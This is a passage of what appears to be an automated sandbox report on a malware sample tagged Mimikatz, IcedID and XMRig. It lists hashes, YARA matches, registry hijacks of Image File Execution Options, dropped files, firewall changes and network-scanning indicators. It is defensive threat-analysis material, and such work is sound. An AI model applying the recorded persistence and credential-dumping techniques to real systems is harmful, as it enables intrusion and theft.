Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 23:22
Behavioral task
behavioral1
Sample
2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe
-
Size
8.8MB
-
MD5
0ec4721a52295127e942ed5415bb7270
-
SHA1
73a57d50ff62408e31576bbc5e5756ca83226457
-
SHA256
b8d01ecad6efa4658859baed44b2ef6fe82441bfc429083803b261181eeb1b77
-
SHA512
fc8575005603ad3b5b6f298e36b75a887361a86a25b85f0c3ca952dc4edb9c37fcde5da8e9661aa844a3cedb55d382c62a61da13c57315805abf3a0bc0f06999
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4792 created 2168 4792 qugzbwz.exe 38 -
Xmrig family
-
Contacts a large (30444) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/116-178-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-182-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-207-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-216-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-225-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-236-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-249-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-283-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-285-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-291-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-292-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig behavioral2/memory/116-298-0x00007FF744670000-0x00007FF744790000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1428-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1428-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b7c-5.dat mimikatz behavioral2/memory/3620-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3032-138-0x00007FF6AF220000-0x00007FF6AF30E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts qugzbwz.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts qugzbwz.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1928 netsh.exe 2104 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 3620 qugzbwz.exe 4792 qugzbwz.exe 2352 wpcap.exe 3100 ttpfdpuzu.exe 3032 vfshost.exe 2860 xohudmc.exe 5020 nslfoo.exe 4316 uyllzzcqz.exe 116 gtnnts.exe 2256 uyllzzcqz.exe 1404 uyllzzcqz.exe 4892 uyllzzcqz.exe 4800 uyllzzcqz.exe 3944 uyllzzcqz.exe 4436 uyllzzcqz.exe 5108 uyllzzcqz.exe 432 qugzbwz.exe 4320 uyllzzcqz.exe 3712 uyllzzcqz.exe 2696 uyllzzcqz.exe 4968 uyllzzcqz.exe 2288 uyllzzcqz.exe 2812 uyllzzcqz.exe 4472 uyllzzcqz.exe 4180 uyllzzcqz.exe 4136 uyllzzcqz.exe 4172 uyllzzcqz.exe 1692 gfspysiek.exe 5048 qugzbwz.exe -
Loads dropped DLL 12 IoCs
pid Process 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 2352 wpcap.exe 3100 ttpfdpuzu.exe 3100 ttpfdpuzu.exe 3100 ttpfdpuzu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 ifconfig.me 66 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content qugzbwz.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 qugzbwz.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F qugzbwz.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies qugzbwz.exe -
resource yara_rule behavioral2/files/0x0007000000023c5a-134.dat upx behavioral2/memory/3032-135-0x00007FF6AF220000-0x00007FF6AF30E000-memory.dmp upx behavioral2/memory/3032-138-0x00007FF6AF220000-0x00007FF6AF30E000-memory.dmp upx behavioral2/files/0x0007000000023c65-155.dat upx behavioral2/memory/4316-156-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4316-160-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/files/0x0007000000023c62-164.dat upx behavioral2/memory/116-165-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/2256-171-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/1404-175-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-178-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/4892-180-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-182-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/4800-185-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/3944-189-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4436-193-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/5108-197-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4320-205-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-207-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/3712-210-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/2696-214-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-216-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/4968-219-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/2288-223-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-225-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/2812-228-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4472-231-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4180-233-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/4136-235-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-236-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/4172-238-0x00007FF67FCA0000-0x00007FF67FCFB000-memory.dmp upx behavioral2/memory/116-249-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/116-283-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/116-285-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/116-291-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/116-292-0x00007FF744670000-0x00007FF744790000-memory.dmp upx behavioral2/memory/116-298-0x00007FF744670000-0x00007FF744790000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\epkuieeth\UnattendGC\specials\spoolsrv.xml qugzbwz.exe File opened for modification C:\Windows\epkuieeth\uybmnnqef\Result.txt gfspysiek.exe File created C:\Windows\epkuieeth\UnattendGC\specials\docmicfg.exe qugzbwz.exe File created C:\Windows\etekeszy\vimpcsvc.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\exma-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\xdvl-0.dll qugzbwz.exe File created C:\Windows\etekeszy\svschost.xml qugzbwz.exe File created C:\Windows\etekeszy\docmicfg.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\svschost.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\vimpcsvc.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\tibe-2.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\trfo-2.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\svschost.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\Packet.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\AppCapture64.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\coli-0.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\ssleay32.dll qugzbwz.exe File created C:\Windows\ime\qugzbwz.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\cnli-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\upbdrjv\swrpwe.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\vimpcsvc.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\wpcap.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\libeay32.dll qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\mimilib.dll qugzbwz.exe File opened for modification C:\Windows\etekeszy\qugzbwz.exe 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe File created C:\Windows\epkuieeth\uybmnnqef\gfspysiek.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\svschost.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\spoolsrv.xml qugzbwz.exe File created C:\Windows\etekeszy\spoolsrv.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\Shellcode.ini qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\AppCapture32.dll qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\mimidrv.sys qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\wpcap.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\docmicfg.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\docmicfg.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\vfshost.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\libxml2.dll qugzbwz.exe File created C:\Windows\etekeszy\qugzbwz.exe 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\tucl-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\schoedcl.xml qugzbwz.exe File opened for modification C:\Windows\epkuieeth\Corporate\log.txt cmd.exe File created C:\Windows\epkuieeth\UnattendGC\specials\crli-0.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\ucl.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\vimpcsvc.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\posh-0.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\schoedcl.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\vimpcsvc.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\svschost.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\spoolsrv.xml qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\ip.txt qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\scan.bat qugzbwz.exe File opened for modification C:\Windows\epkuieeth\uybmnnqef\Packet.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\zlib1.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\spoolsrv.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\docmicfg.xml qugzbwz.exe File created C:\Windows\etekeszy\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\trch-1.dll qugzbwz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3736 sc.exe 4136 sc.exe 3752 sc.exe 4256 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ttpfdpuzu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe 